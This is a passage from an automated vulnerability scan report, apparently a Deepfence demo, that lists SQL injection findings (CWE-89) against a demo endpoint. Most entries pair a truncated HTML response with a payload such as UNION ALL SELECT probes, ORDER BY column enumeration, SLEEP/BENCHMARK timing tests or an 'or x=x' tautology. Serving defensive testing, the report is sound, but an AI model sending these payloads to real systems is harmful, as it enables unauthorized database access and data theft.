src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1000\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1001Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1002\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 19#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1003\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 26--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1004\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),\"'3\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1005\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 5#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1006\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1007\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1008\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\" or \"x\"=\"x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1009\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1010\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1011\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1012Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1013\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('\nA')),4,5#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script 